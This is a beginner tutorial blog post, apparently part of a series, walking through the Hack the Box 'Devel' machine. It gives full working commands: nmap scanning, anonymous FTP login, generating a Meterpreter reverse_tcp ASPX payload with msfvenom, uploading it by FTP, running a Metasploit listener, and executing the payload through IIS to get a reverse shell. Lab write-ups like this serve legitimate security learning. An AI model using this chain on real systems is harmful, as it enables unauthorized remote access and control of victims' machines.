Hacking with Reverse Shell : Part 2

Scanning and assessing FTP vulnerability, exploiting FTP anonymous access, using msfvenom to generate payload appropriate for the situation, planting the payload via ftp, and finally exploiting and getting reverse shell.

This article is Part 2 of the series, which explains how reverse shell works. If you haven’t read the Part1, go read it here. https://prafulnair.medium.com/reverse-shells-in-hacking-part-1-6b53affee4dd

this is how we usually go about hacking/pentesting. Skull Masks are mandatory. Skills or no skills, you need to look like a typical hacker.

I recommend reading Part 1, because it gives the general idea of how reverse shells works, without getting deep into the technicalities of its mechanism. Part 2, this article, will cover exploiting/hacking a system using reverse shell.

DEVEL, from Hack the Box.

In order to explain how reverse shell actually plays out when we are penetesting a machine, or breaking into a ctf machine, I had to take system which exhibited proper condition for the said methodology of reverse shell, and I found that ‘devel’ machine from hack the box is perfect. It’s easy and I felt I will be able to explain this in a lucid manner, as our end goal is to understand how to implement reverse shell. ( There’s a lot of article on reverses shell, however all of them aren’t beginner friendly, and I am trying to make mine understandable even for laymen).

First thing first, if you have hack the box VIP , you can easily access devel from the retired machine’s section. Don’t worry if you dont have this. If you want to implement this tutorial, you can take a very easy ctf machine from vulnhub or websites like vulnhub, download and try the same method, tweaking steps wherever necessary.

nmap scanning result for the target system.

So to begin, I started with my usual nmap scan. And I found that port 21 is open with ftp running. Further I observed that port 80 is running as well, with Microsoft IIS. I used my favorite nmap command :

nmap -A -T4 -O -p- <ip-address>

I didn’t had much luck fingerprinting the OS. Devel is certainly a windows machine, that was for sure (it’s a given info). So I decided I’ll explore the two ports I got in my scan. port 21 and 80.

Port 21, had ftp running, with anonymous logging available. This is usually considered as stumbling across goldmine in pentesting. Although to which extent we have access depends. FTP is file transfer protocol, so It’s not like we have shell access. But let’s see what we can do with it.

got anonymous login easily.

I input command ‘ftp 10.10.10.5’ where 10.10.10.5 is the ip address for me for the target system. And I was in just like that. For login and password you have to type ‘anonymous’.

ftp <ip address>

Now let’s asses our situation. We have our target machine thoroughly scanned with Nmap, which showed that two ports are opened, 21 and 80. We tried ftp the machine, because it allowed anonymous login( result from nmap ) and we got ftp to machine successfully with ‘anonymous’ credential for both login-id/name and password. Good. Now what’s next?

We’ll plant the payload, that’ll give us a reverse shell access at our own machine.

So let’s break down the above sentence.

1. if we want to plant a payload, we have to generate it first. So we’ll generate a payload using msfvenom.
2. how to plant? did you forget we have ftp connection with target machine. We’ll transfer our payload file to it.
3. How to get reverse shell finally? for this we have to do two things. First we have to see how to execute the file once transferred (hint: port 80 running httpd server).
4. finally we have to open a listener at our workstation in order to get the shell. For that we will make use of MsfConsole.

Since we have now drawn out the plan/blueprint, let’s go try do the things one by one. But before that let’s see what port 80 has for us.

web server at port 80.

So there’s a web server running at port 80. So this could be useful. We can just place our payload file in the web server’s directory and the simply execute it here.

http://10.10.10.5/payload.aspx

this will execute the file. Since now we have figured that out, let’s go make our payload.

generating payload with msfvenom.

For this open a separate tab on your terminal (or just another terminal) and type the following command.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<your ip> LPORT=4000 -f aspx > rev.aspx

Let me explain what we are doing. With msfvenom we are trying to generate an appropriate payload that’ll give us reverse shell. For this we are choosing reverse_tcp payload, for windows. This one is meterpreter, but you could try the same with generic one as well. Further we are providing our Ip and our port where we will be listening for the connection. The file rev.aspx will be created, which is our Payload.

So payload is generated. Let’s now go and create a listener at our machine. Make sure while making this listener, port is same as the one specified while creating the payload. In this example I have used port 4000, so I have to go the same while creating listener as well. Open Metasploit with command

msfconsole

This will open the metasploit for you in your terminal. Now do the following.

the multi- handler we using to listen for incoming connections

So now type :

use exploit/multi/handler

This is the exploit we are using. Type ‘show options’ to see all the parameters you can set. I think you just have to specify the port as 4000

all options for the handler

show options

set LPORT 4000

set payload windows/meterpreter/reverse_tcp

So three commands to enter. First just to show all options you have for your exploit. Next set port as 4000 and finally set the payload ; same as the one you used to generate the payload in msfvenom.

Once everything is set and in order, execute the exploit with command ‘run’. Congratulations, you have completed 75 % of the task. You have opened up a listener at your IP on port 4000, ready show shell access when payload is executed.

transfer payload to the target machine.

You might have to reconnect with FTP as it might have discarded the current inactive session. So just run the ftp command again and get connected. Once connected type ‘binary’. This is an optional step, I am just making sure my payload works. After that type :

put <payload_file_name>

This will transfer the generated payload. The above screenshot is transferring rshell.aspx, which isn’t rev.aspx as we discussed earlier. Don’t get confused, I actually generated a new payload with same command and put the newer one here, you just transfer your payload. Once that’s done, you have to go back to your web browser which has opened 10.10.10.5/ or the page of your target machine.

Then type ‘/payload_file_name’, continuing with your web url of machine. For ex if my target system web page is http://10.10.10.5, I’ll type

http://10.10.10.5/payload_file.aspx

or http://10.10.10.5/rev.asxp , in our case.

This will execute the payload at victim’s side. Which will in turn, send the connection back to us, opening up a reverse shell access at our terminal.

we got meterpreter at our terminal.

So we got the meterpreter shell on our system. Now we can access files and folders of the victim machine.

fin

So that was it! Pretty neat, right ? So this is how, one way to make reverse shell happen. I recommend more reading from your side to amp up your knowledge on hacking via these kind of techniques.

If you made it this far, Congratulations. Do post any queries or doubts on comments.

Photo art Credit : Photo by Nahel Abdul Hadi on Unsplash